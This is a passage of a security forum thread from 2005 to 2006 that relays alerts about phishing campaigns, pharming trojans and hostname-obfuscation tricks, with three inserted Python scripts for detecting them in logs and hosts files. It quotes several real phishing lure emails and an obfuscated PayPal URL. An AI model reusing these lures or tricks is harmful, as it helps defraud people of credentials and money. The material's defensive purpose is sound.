"Phishing" schemes - New Exploits


106 replies to this topic

#51 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 14 December 2005 - 06:57 AM

FYI...

Malicious Website / Malicious Code: Fake McAfee Patch
- http://www.websenses...php?AlertID=370
December 13, 2005
"Websense® Security Labs™ has received reports of an email scam disguised as a patch for McAfee products. Users receive a spoofed email message instructing them to click on a link to immediately download and install a patch from McAfee. This patch claims to address a virus that does not exist. The link in the email takes users to a fraudulent website that appears to be the legitimate McAfee security site.
The patch hosted on this page is actually a Trojan downloader. The malicious site is hosted in the United States and was online at the time of this alert.

(Malicious site screenshot shown at URL above.)

Also see: http://www.f-secure....5.html#00000733

:(

Edited by apluswebmaster, 14 December 2005 - 07:40 AM.

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#52 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 19 December 2005 - 08:44 PM

FYI...

Spyware Lures to Install Potentially Unwanted Software
- http://www.websenses...php?AlertID=379
December 19, 2005
"Websense Security Labs ™ is seeing a large increase in the number of websites and emails that use deception and/or browser vulnerabilities to install potentially unwanted software. The common theme among these threats is the use of lures about possible spyware infections on your machine. In some cases, the scam actually reports fraudulent information regarding the security of your PC.
In many cases they also request money in return for cleaning the outlined security problems (we have seen as much as $500 per year). Over the last 2 weeks, we have identified more than 1500 sites that have some (or all) of the following criteria:
- They are hosted in Ukraine and Russia
- The website domain names are registered in countries like Vanuatu and Mexico
- IP netblocks hosting sites are often hosting other questionable sites such as fraudulent search engines
- IP netblocks have been hosting malicious code such as Trojan horse downloaders, droppers, and hosts-file redirection software
- Malicious code that modifies DNS settings has used these netblocks for DNS resolving
- Downloaded code often includes several pieces of spyware, adware, and other potentially unwanted software
- Removing the software often requires that you fill out a survey
- Several of the sites contain links to other sites that are hosting IE exploit code ..."

(Various Example Screenshots available at URL above.)

:eek:



#53 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 09 January 2006 - 07:22 AM

FYI...

Phishers catch eBay users again
- http://www.infomatic...ck-targets-ebay
06 Jan 2006
"Criminals are again targeting eBay members, this time by sending forged auction inquiries from what appears to be the site's 'Question from eBay Member' message portal, according to security experts SpamStopsHere.
Account holders are prompted to respond to the inquiry by clicking the 'Respond Now' button in the email, and are then directed to a fraudulent eBay log-in screen. After the seller has entered their log-in information the fraudsters steal their identity for later use.
Known as 'spear phishing', the attack is distinctive in that it is targeted and focused on one end user or organisation at a time. Spear phishing emails are designed to appear as if they are sent from a trusted individual or company, and typically ask for log-in IDs and passwords. Ted Green, chief executive at SpamStopsHere, said: "We are seeing an evolution in phishing and spear phishing attacks, and the sophistication is constantly increasing. Cyber-criminals are relentless in developing new and ingenious methods of monetary and identity theft."
Ebay members were targeted in a mass phishing campaign before Christmas which represented 96 per cent of all UK phishing attacks in December."

Also: http://castlecops.co..._scam_site.html

:hmmm:



#54 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 11 January 2006 - 05:53 PM

FYI...

Malicious Websites / Malicious Code: When Greyhats turn to Blackhats
- http://www.websenses...php?AlertID=395
January 11, 2006
"Throughout December, Websense Security Labs™ reported a number of cases where browser and Operating System vulnerabilities were being used to install Potentially Unwanted Software onto end-users' machines without user-intervention. In several cases, dozens of pieces of code were installed, and often report false information in order to entice the end-user to clean their machine from spyware.
We are now seeing some of those same entities using their exploit code to install more reprehensible crimeware, such as key loggers and phishing traffic redirectors. This code is designed to steal information in addition to the installation of potentially unwanted software.
Users are typically infected through an IFRAME, loaded silently from a compromised website or an advertisement network pop-up. The exploit code loaded through these IFRAME tags attempts to use several dozen vulnerabilities, including the two recent zero-day vulnerabilities: MS05-054 and MS06-001. Users who are patched against these vulnerabilities are displayed an ActiveX prompt to install the exploit code...
Recently, we have seen the downloaded files performing additional functions, including:
- Banking keyloggers
- Trojan horses with root-kit functionality
- Traffic redirectors that direct you to fraudulent Paypal websites
- Trojan horse backdoors
- Internet Explorer process injection ..."

(URL above includes screenshots and code examples...)

:(



#55 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 23 January 2006 - 08:51 PM

FYI...

Phishing Alert: Yahoo! Account Compromise through Yahoo! IM
- http://www.websenses...php?AlertID=403
January 23, 2006
"Websense® Security Labs™ has received several reports of a new phishing attack that targets Yahoo! customers. Users receive a message through Yahoo! Instant Messenger, enticing them to access a website with "click on this website." Upon clicking on the website, users are forwarded to a fraudulent website, which is hosted in the United States and was up at the time of this alert. It requests their Yahoo! Photos username and password. Once users have entered their username and password, they receive an error message that their email account was incorrect, at which time the account information is forwarded to a third party and the end-users' account information could then be compromised.

(Phishing website screenshot available at URL above.)

:ph34r:



#56 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 10 February 2006 - 07:48 PM

FYI...

Phishing Alert: Adobe
- http://www.websenses...php?AlertID=422
February 10, 2006
"Websense® Security Labs™ has received reports of a new phishing attack, using the brand name of Adobe Systems Incorporated. Users receive a spoofed email that provides a link to the phishing website, which is designed to mimic the Adobe online store. Users are given the option to buy and download Adobe products at substantially discounted rates. The site has links to awards hosted locally, which supposedly prove its veracity. When checking out, the user is prompted for credit card information.

This phishing site is hosted in China and was up at the time of this alert."

(Phishing screenshot available at the URL above.)

:grrr:



#57 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 22 February 2006 - 01:29 PM

FYI...

Antiphishing.org Trend Report
- http://isc.sans.org/...hp?storyid=1141
Last Updated: 2006-02-22 18:00:24 UTC
"In case you've missed it, the Anti-Phishing Working Group have published their latest (December 05) trend report a couple of days ago. Interesting as always. See:
- http://www.antiphish...C2005_FINAL.pdf "


:!:



#58 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 24 February 2006 - 09:04 AM

FYI...

Increased deployment of Phishing Kits
- http://www.websenses...php?AlertID=433
February 23, 2006
"Websense® Security Labs is seeing a significant increase in the number of Phishing kits used to host multiple target brands on a single host and deploy similar attack code on several machines. Currently the most popular is being referred to as the "Rock Phish Kit". The kit appears to have surfaced around November of 2005, but the frequency of its use is growing.
* Sites often use either an IP address or a fraudulent domain name.
* Sites usually have /rock/ or /r/ in the URL path, followed by an alpha character.
* Quite often the letter after the /r/ matches the target name (e.g., ...www.samplerockphish.com/r/b = barclays).
* Sites are usually hosted in Asia.
* Sites use the same PHP script to post the data.
* Sites often use JavaScript tricks to replace the browser toolbar and disable keyboard functions such as Cut and Paste.
...we have included screenshots from a recent site that was hosting 6 target brands.
/a/ -> Alliance & Leicester
/b/ -> Barclays
/c/ -> Citibank
/d/ -> Deutsche Bank
/e/ -> eBay
/h/ -> Halifax ..."

(Screenshots available at the URL above.)

:wtf:


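The Websense alert above lists two things an analyst can look for in web proxy logs: requests to a bare IP address instead of a domain, and a path of the form /rock/x or /r/x where the single letter selects the target brand. The script below, added here as an illustration and not code from Websense or from this thread, turns those two observations into a log audit. The log line format (timestamp, client, method, URL) and the client and server addresses are constructed; the brand letters are the ones quoted in the alert.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Brand letters quoted in the Websense alert above. A real deployment would
# maintain this table from current intelligence; any letter not listed is
# still reported, just without a brand name.
ROCK_BRAND_LETTERS = {
    "a": "Alliance & Leicester",
    "b": "Barclays",
    "c": "Citibank",
    "d": "Deutsche Bank",
    "e": "eBay",
    "h": "Halifax",
}

# "/rock/" or "/r/" followed by a single alphabetic path component, as the
# alert describes (e.g. /r/b for Barclays). The trailing "(?:/|$)" keeps
# ordinary paths such as /r/ssl-login from matching.
ROCK_PATH_RE = re.compile(r"^/(?:rock|r)/([A-Za-z])(?:/|$)")


def is_ip_literal(host):
    """True when the host part of a URL is a bare IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def classify_url(url):
    """Return the list of heuristic hits for one URL; an empty list means no hit."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    hits = []
    if is_ip_literal(host):
        hits.append("ip-literal-host")
    match = ROCK_PATH_RE.match(parts.path)
    if match:
        letter = match.group(1).lower()
        hits.append("rock-path:%s=%s" % (letter, ROCK_BRAND_LETTERS.get(letter, "unknown")))
    return hits


def scan_proxy_log(lines):
    """Scan 'timestamp client method url' lines; return (client, url, hits) for flagged requests."""
    flagged = []
    for line in lines:
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed line: skip it rather than abort the audit
        client, url = fields[1], fields[3]
        hits = classify_url(url)
        if hits:
            flagged.append((client, url, hits))
    return flagged


# Constructed sample log lines (hypothetical clients, TEST-NET server addresses).
SAMPLE_LOG = [
    "1140700000 10.0.0.5 GET http://203.0.113.7/r/b/login.php",
    "1140700001 10.0.0.6 GET http://www.example.com/news/index.html",
    "1140700002 10.0.0.7 GET http://bank-secure-login.example/rock/c/",
    "1140700003 10.0.0.8 GET http://www.example.org/r/ssl-login",
    "1140700004 10.0.0.9 GET http://198.51.100.23/images/logo.gif",
]

if __name__ == "__main__":
    for client, url, hits in scan_proxy_log(SAMPLE_LOG):
        print(client, url, ", ".join(hits))
```

Three of the five sample requests are flagged: the first hits both heuristics (IP literal plus /r/b = Barclays), the third hits the /rock/c path, and the last is an IP literal on its own. The /r/ssl-login line is deliberately not flagged, since the alert describes a single letter after the prefix, not any path starting with /r/.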

#59 quietman7

  • Helper
  • 680 posts

Posted 25 February 2006 - 07:07 AM

Rootkit Pharming

Haxdoor is one of the most advanced rootkit malware out there. It is a kernel-mode rootkit, but most of its hooks are in user-mode. It actually injects its hooks to the user-mode from the kernel -- which is really unique and kind of bizarre.

So, why doesn't Haxdoor just hook system calls in the kernel? A recent Secure Science paper has a good explanation for this. Haxdoor is used for phishing and pharming attacks against online banks. Pharming, according to Anti-Phishing Working Group (APWG), is an attack that misdirects users to fraudulent sites or proxy servers, typically through DNS hijacking or poisoning.

We took a careful look at Backdoor.Win32.Haxdoor.gh (detection added 31 Jan, 2006). It hooks HTTP functionality, redirects traffic, steals private information, and transmits the stolen data to a web-server controlled by the attacker. Most (all?) online banks use SSL encrypted connections to protect transmissions. If Haxdoor would hook networking functionality in the kernel, it would have a hard time phishing since the data would be encrypted. By hooking on a high-enough API level it is able to grab the data before it gets encrypted. Apparently Haxdoor is designed to steal data especially from IE users, and not all tricks it plays work against, for example, Firefox.

f-secure.com/weblog
Microsoft MVP - Consumer Security 2007-2015 MVP.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

#60 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 18 March 2006 - 08:10 AM

FYI...

Phishing Alert: Career Builder
- http://www.websenses...php?AlertID=445
March 14, 2006
"Websense® Security Labs™ has received reports of a new phishing attack that targets members of CareerBuilder.com. Users receive a spoofed email message, which claims that their account information must be verified due to unauthorized access. The message provides a link to a phishing website. Users who visit this website are prompted to enter personal information. This phishing site is hosted in the Republic of Korea and was down at the time of this alert.

Phishing Email:

Dear < e-mail removed >,
We recently noticed one or more attempts to log in to your Careerbuilder account from a different IP address.
If you recently accessed your account while traveling, the unusual log in attempts may have been initiated by you. However, if you did not initiate the log ins, please visit Careerbuilder as soon as possible to check-up your account information:
< URL REMOVED >
Thanks for your patience.
Sincerely, Careerbuilder
Please do not reply to this e-mail. Mail sent to this address cannot be answered..."

(Phishing screenshot available at the Websense URL above.)

:(



#61 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 20 March 2006 - 12:28 PM

FYI...

Malicious Website/Code: Trojan targeting more than 100 banks
- http://www.websenses...php?AlertID=447
March 19, 2006
"Websense® Security Labs™ has received reports of a Trojan Horse which targets users of more than 100 financial institutions in the United States and Europe. Once installed on a user's machine, the malicious code checks to see if there is an active window open (either "my computer" or Internet Explorer). If one of these applications is not open, the malicious code modifies the contents of the hosts file on the local machine with a list of sites all pointing to localhost (127.0.0.1).
If either of these applications is open, the behavior is different. In this case, the malicious code performs a DNS lookup to a DNS server hosted in Russia and receives an address for a website. The address returned from that DNS server is then populated into the hosts file along with a list of target brands. If the target machine visits one of the sites in the list, the machine is redirected to a fraudulent web site on the hosted machine in Russia. This allows the attacker to change the destination address through DNS if one of the servers is taken offline.
The web server uses the hostname received to serve up pages for that particular target. There are more than 100 different phishing brands hosted on this site, all with unique pages for the particular attack.

(Screenshots available at the Websense URL above.)

:eek:


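The Trojan in the alert above leaves its footprint in the local hosts file: first a batch of names pointed at 127.0.0.1, then a list of bank brands all pointed at one address fetched from the attacker's DNS server. A hosts-file audit can catch both phases. The following script is an added example (not Websense's code and not from this thread): it parses hosts-file text, reports watchlisted names that have been sinkholed or redirected, reports any other non-loopback mapping, and then groups redirected names by address, since many brand names sharing one address is the pattern the alert describes. The watchlist and the sample hosts content are constructed.

```python
import ipaddress
from collections import defaultdict

# Constructed watchlist of names a legitimate local hosts file should never
# override: brand domains and update servers. A real deployment would use the
# organisation's own list.
WATCHLIST = {
    "onlinebank.example",
    "secure.onlinebank.example",
    "av-updates.example",
}


def parse_hosts(text):
    """Yield (line_no, ip, hostname) for every mapping, ignoring comments and blanks."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 2:
            continue
        ip, names = fields[0], fields[1:]
        for name in names:  # one address may be followed by several names
            yield line_no, ip, name.lower()


def audit_hosts(text, watchlist=WATCHLIST):
    """Return (line_no, hostname, ip, verdict) for every entry worth an analyst's attention."""
    findings = []
    for line_no, ip, name in parse_hosts(text):
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            findings.append((line_no, name, ip, "unparseable-address"))
            continue
        if addr.is_loopback:
            # Phase one in the alert: brand or update sites sinkholed to 127.0.0.1.
            if name in watchlist:
                findings.append((line_no, name, ip, "sinkholed-watchlisted-name"))
        elif name in watchlist:
            # Phase two: a watchlisted brand pointed at an attacker-chosen host.
            findings.append((line_no, name, ip, "redirected-watchlisted-name"))
        else:
            # Any other non-loopback mapping is unusual on a workstation; report it.
            findings.append((line_no, name, ip, "non-loopback-mapping"))
    return findings


def shared_redirect_targets(findings):
    """Group non-loopback findings by address; several names on one address is the pharming pattern."""
    by_ip = defaultdict(list)
    for _, name, ip, verdict in findings:
        if verdict in ("redirected-watchlisted-name", "non-loopback-mapping"):
            by_ip[ip].append(name)
    return {ip: names for ip, names in by_ip.items() if len(names) > 1}


# Constructed hosts file content; 203.0.113.7 is a TEST-NET address standing in
# for the attacker's web server.
SAMPLE_HOSTS = """# constructed sample
127.0.0.1 localhost
192.168.1.10 intranet.corp.example
127.0.0.1 av-updates.example
203.0.113.7 onlinebank.example secure.onlinebank.example
203.0.113.7 www.otherbank.example
"""

if __name__ == "__main__":
    results = audit_hosts(SAMPLE_HOSTS)
    for finding in results:
        print(*finding)
    print(shared_redirect_targets(results))
```

On Windows the file to feed in is %SystemRoot%\System32\drivers\etc\hosts; on Unix-like systems it is /etc/hosts. The sample produces five findings, and the grouping step shows the single address that three different names have been pointed at. The intranet entry is reported only as informational, so legitimate local overrides can be whitelisted without hiding the brand redirections.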

#62 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 25 March 2006 - 09:51 PM

Phishing attacks hit record highs...

Per the APWG January report*, there were 17,877 unique phishing reports, and 9,715 unique phishing websites.

* http://www.antiphish...rt_jan_2006.pdf



:huh: :angry: :ninja:



#63 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 29 March 2006 - 04:56 PM

FYI...

Hackers Tap Banks' Web Sites In Unique Phishing Attack
- http://www.techweb.c..._section=700028
March 29, 2006
"In an unusual form of phishing, hackers cracked the computers hosting the Web sites of three Florida banks, redirecting banking customers to a bogus homepage in order to steal account information and other personal data. ElectroNet Intermedia Consulting, the Tallahassee, Fla., service provider that hosts the sites of Capital City Bank, Wakulla Bank and Premier Bank, told the Tallahassee Democrat newspaper that the scam was spotted within an hour after it started March 21, and the sites were shut down for a short period. The Florida Department of Law Enforcement was investigating the case, and no arrests had been made. Neither the FDLE nor ElectroNet were immediately available for comment. The incident marked a new tactic in phishing, a form of deception in which crooks use spam to lure people to bogus banking sites to enter passwords and other personal information, said John Quarterman, chief executive of Austin, Texas-based, InternetPerils Inc., which tracks Internet scams...
The hackers entered two servers running Microsoft Internet Information Services and planted the script needed to redirect people from the banks' legitimate sites to a bogus one. "This new scam is like phishing without the intervening electronic mail step," Quarterman said. "Because it is the bank's own Web (hosted, in this and no doubt many other cases) server that is compromised, the customer has even less reason to suspect anything amiss"..."

:(



#64 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 05 April 2006 - 02:57 PM

FYI...

Malicious Code: New Trojan Banker Technique
- http://www.websenses...php?AlertID=458
April 05, 2006
"Websense® Security Labs™ has received reports of a Trojan Horse that uses a new technique to steal financial account information. The Trojan monitors Microsoft® Internet Explorer and waits for the user to visit one of a dozen financial websites. Once the user begins the logon process, the Trojan creates a pop-up window to replace the actual logon page. These pop-up windows are customized for each website and designed to spoof the appearance of the legitimate logon page. Account information entered into these pop-up windows is captured and emailed to the attacker.
This Banker Trojan has currently not been assigned a name by any anti-virus vendors..."

(Screenshots are available at the URL above.)


:eek:

Edited by apluswebmaster, 05 April 2006 - 02:58 PM.



#65 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 26 April 2006 - 07:33 AM

FYI...

Phishers Snare Victims With VoIP
- http://www.techweb.c..._section=700028
April 25, 2006
"A security firm on Tuesday reported discovering a phishing scheme in which the scammers used Internet telephony to copy a bank's automated voice system in order to steal customers' passwords, account numbers and other personal information. In the attack that occurred last week, con artists sent spam disguised as coming from a small bank in a large East Coast city, Cloudmark Inc., a messaging security firm, said. The message asked the recipient to dial a telephone number to talk with a bank representative. The number went to an automated voice system that asked for an account number and personal identification number, or PIN, in order to access the caller's finances. The number was obtained through a regular provider of voice over Internet protocol services. There was no indication that the VoIP provider was aware of the scam, said Cloudmark, which declined to name the company and the spoofed bank. The incident reflected a mutation in the tactics used by phishers to snare victims. More traditional schemes involve spam asking the recipient to visit their bank's Web site through a link in the message. At the bogus site, the visitor is asked to input personal information. The latest scheme, however, is the first Cloudmark has seen using Internet telephony..."
- http://www.cloudmark...se=2006-04-25-2

:(



#66 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 01 May 2006 - 11:33 AM

FYI...

American Express: Beware Phony Log-In Screen
- http://www.eweek.com...,1955288,00.asp?
April 28, 2006
"...In an alert posted online, the New York-based company added a screenshot of the pop-up, which tries to lure the user into entering name, social security number, mother's maiden name and date of birth. "Please note that this fraudulent activity may be the result of a computer virus and is not a part of the American Express website. If you received this pop-up box, your computer may have this virus," the company warned. Security researchers tracking malicious Internet activity say the fake pop-up is a classic example of a banking Trojan targeting specific financial institutions, even when the user is surfing on a secure, authenticated Web site..."

- http://www10.america...41,24381,00.asp
"As an example of phishing, please note that some of our customers reported receiving the following pop-up screen while logged into our secure site. The pop-up screen is known to be a hoax..."

(Screenshot available at the AMEX URL above.)

:eek:



#67 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 18 May 2006 - 04:16 PM

FYI...

Phishers use url encoding to obfuscate hostnames
- http://isc.sans.org/...hp?storyid=1342
Last Updated: 2006-05-18 20:39:00 UTC
"...Some browsers allow URL encoded host names. The impact is similar to the old (no longer working) method of using the "username:password@url" notation. So the impact is not "huge", but it's yet another trick in the phishing arsenal.
Theoretically, a host name should only contain letters A-Z, numbers 0-9 and dashes (-). In order to support foreign character sets, "IDN" is used, which uses that same set of characters to encode. For domain names, this is enforced by the registrars, but host names for existing domains are up to the user, and DNS servers typically allow "anything" (after all, DNS can be used for other things than host names).
We found that Internet Explorer, Safari and to some extent Opera will accept URL encoded host names and redirect to the "decoded" version. Further, they will allow spaces as part of host names. This is used by phishers to obfuscate URLs.
Explorer and Opera will accept the URL encoded host name, and redirect to it. But once you arrive at the page, the URL bar will show the URL in clear text.
Safari does accept URL encoded host names as well, but will NOT decode it as you arrive at the destination page.
Firefox refuses to use URL encoded host names.

Simple sample to test (not clickable, copy&paste):
http://www.paypal.co...scr%6...d.com
or try a host name with space vs. without (less of an issue as you would have to control DNS for the domain to use it):
http://www .securewebbank.com (vs. http://www.securewebbank.com )
URL encoding is only supposed to be used after the host name to encode the file name and the GET parameters.

Suggested defenses:
Inform users about this problem.
Audit DNS caches to see if users asked to resolve such a host name.
Audit proxy logs for such domains, and filter if possible."


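The ISC diary above suggests auditing proxy logs and DNS caches for host names that carry percent-encoding or spaces. The script below is an added example (not the ISC's code and not from this thread) of that audit: it pulls the authority out of the raw URL string without decoding it, separates userinfo and port, and then reports the tricks the diary lists (the old user:pass@host form, percent-encoding inside the host, whitespace, and any other character outside the letters/digits/hyphen/dot set). It also shows the decoded host so an analyst can see where the browser would actually go. The sample URLs are constructed, modelled on the diary's examples, using .example names and TEST-NET addresses.

```python
import re
import string
from urllib.parse import unquote

# scheme "://" authority; the authority is everything up to the first "/", "?" or "#".
# Taken from the raw string on purpose: we want what was typed, not what a lenient
# browser would make of it.
AUTHORITY_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://([^/?#]*)")

# Letters, digits, hyphen and dot are the only characters a hostname should carry
# (brackets and colon are tolerated for an IPv6 literal).
HOST_ALLOWED = set(string.ascii_letters + string.digits + "-.[]:")


def split_authority(authority):
    """Return (userinfo, host, port) from a raw authority string, without decoding anything."""
    userinfo = None
    if "@" in authority:
        userinfo, authority = authority.rsplit("@", 1)
    match = re.match(r"^(.*?)(?::(\d+))?$", authority)
    return userinfo, match.group(1), match.group(2)


def inspect_host(url):
    """Report hostname obfuscation tricks in one URL; 'findings' is empty for a clean host."""
    match = AUTHORITY_RE.match(url)
    if not match:
        return {"host": None, "decoded_host": None, "findings": ["no-authority"]}
    userinfo, host, _port = split_authority(match.group(1))
    findings = []
    if userinfo is not None:
        findings.append("userinfo-present")        # the old user:pass@host trick
    if "%" in host:
        findings.append("percent-encoded-host")    # encoding belongs after the host, never in it
    if any(ch.isspace() for ch in host):
        findings.append("whitespace-in-host")
    stray = {ch for ch in host if ch not in HOST_ALLOWED and ch != "%" and not ch.isspace()}
    if stray:
        findings.append("non-ldh-characters")
    return {"host": host, "decoded_host": unquote(host), "findings": findings}


def scan_urls(urls):
    """Audit a list of URLs (e.g. pulled from proxy logs) and return only the flagged ones."""
    flagged = []
    for url in urls:
        report = inspect_host(url)
        if report["findings"]:
            flagged.append((url, report))
    return flagged


# Constructed URLs modelled on the diary's samples.
SAMPLE_URLS = [
    "http://www.paypal.co%6D.example/",
    "http://www .securewebbank.example/",
    "http://www.bank.example@203.0.113.9/",
    "https://www.securewebbank.example/login",
]

if __name__ == "__main__":
    for url, report in scan_urls(SAMPLE_URLS):
        print(url, "->", report["decoded_host"], report["findings"])
```

The first sample is the instructive one: the raw host reads as a PayPal name, but once the %6D is decoded it is www.paypal.com.example, a host under a completely different domain. Feeding the raw URL column of a proxy log through scan_urls gives exactly the list the diary recommends filtering on.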

#68 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 01 June 2006 - 03:41 PM

FYI...

Phishing Alert: MySpace.com / AIM
- http://www.websenses...php?AlertID=504
June 01, 2006
"Websense® Security Labs™ has discovered a phishing attack that attempts to steal the account information of MySpace.com users. A hyperlink is first delivered to victims via AOL Instant Messenger. Users who follow this link are taken to a fraudulent website that spoofs the MySpace.com login page. This page captures their MySpace account information and then forwards the user to the actual MySpace.com website. The fraudulent site also sets a cookie on the victim's computer, which prevents the phishing attack from being displayed on any subsequent visits. The phishing site is located in California and was up at the time of this alert. Screenshot available with full alert.
For additional details and information on how to detect and prevent this type of attack:
* http://www.websenses...php?AlertID=504 ..."

:ph34r:



#69 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 12 June 2006 - 07:13 PM

FYI...

Phishing Alert: FDIC
- http://www.websense....php?AlertID=518
June 12, 2006
"Websense® Security Labs™ has received reports of a new phishing attack that targets customers of FDIC insured institutions. Customers receive a spoofed email message, which claims that their account is in violation of the Patriot Act, and that FDIC insurance has been removed from their account until their identity can be verified. This message provides a link to a phishing website which prompts users to enter account information to verify their identity. This phishing site is hosted in Hungary and was up at the time of this alert.
Phishing email:
'In cooperation with the Department Of Homeland Security, Federal, State and Local Governments your account has been denied insurance from the Federal Deposit Insurance Corporation due to suspected violations of the Patriot Act'..."

(Screenshots available at the URL above.)

:( :hmmm:



#70 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 16 June 2006 - 12:13 PM

FYI...

Pay Pal Phish Phlaw?
- http://isc.sans.org/...hp?storyid=1422
Last Updated: 2006-06-16 17:05:22 UTC
"We've received a report of a potential flaw in the PayPal website that is being used to steal credit card and other personal information from PayPal users. The scam works by tricking users into accessing a URL hosted on the genuine PayPal web site. The URL uses SSL to encrypt information transmitted to and from the site, and a valid 256-bit SSL certificate is presented to confirm that the site does indeed belong to PayPal.
When the victim visits the page, they are presented with a message that has been 'injected' onto the genuine PayPal site that says, "Your account is currently disabled because we think it has been accessed by a third party. You will now be redirected to Resolution Center." After a short pause, the victim is then redirected to an external server, (apparently somewhere in Korean IP space) which presents a very convincing fake PayPal Member log-In page. Logging in sends the PayPal username and password to the bad guys and causes another page asking for more information (social security number, credit card number ...) to remove the limits on the access of their account. More to come as we confirm information."
Also:
- http://news.netcraft...tity_theft.html
Jun 16, 2006

EDIT/ADD:
- http://news.com.com/...g=st.util.print
Jun 16 17:16:35 PDT 2006
"...By exploiting the flaw, attackers were able to redirect people from a PayPal Web page to an online trap located in South Korea, a representative for the service said. The page actually has a real PayPal URL, but hosts malicious code that presents a message warning members that their account had been compromised. It then redirects them to a "phishing" Web site. At the malicious, information-thieving Web site, people are asked for their PayPal login information, experts at Netcraft, an Internet monitoring company in England, said in an advisory. Subsequently, the scammers are urged to enter their Social Security number and credit card details, Netcraft said. "As soon as we became aware of this scheme, we changed some of the code on the PayPal Web site. So this scheme, or any scheme like it, can no longer be effective," Amanda Pires, a PayPal spokeswoman, said in an interview..."

:(

Edited by apluswebmaster, 17 June 2006 - 08:21 AM.



#71 quietman7

  • Helper
  • 680 posts

Posted 23 June 2006 - 08:01 AM

New Phishing Exploits Emerge

The Anti-Phishing Working Group (APWG) yesterday released its latest phishing trends report, which shows that the number of different "brands" (organizations) reporting phishing attacks jumped from 97 in April to 137 in May: the most since December, when it was at 121...While phishing is spreading, however, many observers are more worried about the improved quality of attacks than about their quantity. Experts who track the phishing scene say they are seeing a new wave of exploits that go far beyond the old Website-hijacking scams. Keyloggers are among the most sophisticated and fastest-growing types of phishing attacks on the Web...The keylogger's goal: Infect user machines and, ultimately, steal their data and privileges. "There's a shift in using malicious code and exploits to infect users instead of Websites with a simply deceptive tactic...At the same time, phishing toolkits are getting easier to obtain.

darkreading.com

#72 AplusWebMaster

  • SWI Friend
  • 10,566 posts

Posted 05 July 2006 - 10:18 PM

FYI...

Yahoo! user account phishing
- http://isc.sans.org/...hp?storyid=1463
Last Updated: 2006-07-06 00:10:23 UTC
"...The web site, which you can see*... is actually hosted on Geocities. The URL will immediately alert any user that knows what he's looking for (and this is why we can not stress enough how important user awareness and education is).
As you can see*... the design is fairly good, and if you don't check the URL, you might be fooled into entering your credentials here. There are a couple of issues here about which we wrote recently ( http://isc.sans.org/...hp?storyid=1277 ). While we were looking at bank web sites in the original diary by Johannes, we have a similar problem here. Although the credentials are transferred over the network securely (using SSL), the front web page seems to be plain HTTP. A typical user doesn't know how to check what's happening once he clicks on the "Login" button, so it's very easy to launch phishing attacks like this on them. That's why you should always use SSL on the front web page at least (yes, there are other numerous attacks on this, but let's stick to this subject for this moment).
Back to the phishing web page. Once a user tries to log in, his credentials are sent to a CGI script on a remote site which then (probably) e-mails this to the attacker. The last interesting thing is related to obfuscation of the HTML. The attacker decided to use a product called HTML Protector. This tool basically just obfuscates HTML code using JavaScript but as a browser needs to be able to parse the HTML code, the unobfuscation function always has to be present, so with some spare time you can easily unobfuscate this."

(* Screenshot available at the ISC URL above.)

:(

.The machine has no brain.
 ......... Use your own.
Browser check for updates here.
YOU need to defend against -all- vulnerabilities.
Hacks only need to find -1- to get in...
.


#73 AplusWebMaster

Posted 10 July 2006 - 04:43 PM

FYI...

Phishing Alert: Google Mail
- http://www.websense....php?AlertID=545
July 10, 2006
"Websense® Security Labs™ has received reports that a variant of Google phishing attacks (discussed in a previous alert*) are increasing in sophistication. Users are shown a spoofed copy of the Gmail login page with a message claiming, "You WON $500.00!" The message states that this prize money will be delivered to an e-Gold, PayPal, StormPay, or MoneyBookers account of their choice. If users select an account, they are informed that this prize money is only available to "premium members" of "Gmail Games." The page states that "Gmail Games" membership requires an $8.60 registration fee, and then asks users to pay the registration fee or forfeit the $500 prize money. Users are directed to an actual payment site to deliver the registration fee. This phishing site is hosted in the United States and was up at the time of this alert.
> Sample Email Lure:
* *You won $500! Gmail congratulates you!* *
CONGRATULATIONS!
YOU WON $500!*
Gmail gives members random cash prizes. Today, your account is randomly selected as the one of 12 top winners accounts who will get cash prizes from us. Please click the link below and follow instructions on our web site. Your money will be paid directly to your e-gold, PayPal, StormPay or MoneyBookers account.
Click here to get your prize:
<URL Removed>
Sincerely,
The Gmail.com staff
Gmail.com ..."

(Screenshot available at the URL above)

* http://www.websense....php?AlertID=332

:ph34r:



#74 AplusWebMaster

Posted 10 July 2006 - 05:23 PM

FYI...

Phishing Alert: -Fraudulent- "Stop Fraud Now" Program
- http://www.websense....php?AlertID=546
July 10, 2006
"Websense® Security Labs™ has received reports of a new phishing attack that targets customers of Bank of America and various other banks. Users receive a spoofed email message, which claims that a new security program called SFN (Stop Fraud Now) has been launched. The program claims to provide protection against cloning of credit cards and asks users to provide details, such as Social Security Number, card number, and ATM Personal Identification Number (PIN). The message provides a link to a phishing website that requests users enter their personal information and account details. The phishing site is hosted in Canada and was up at the time of this alert.
> Phishing email:
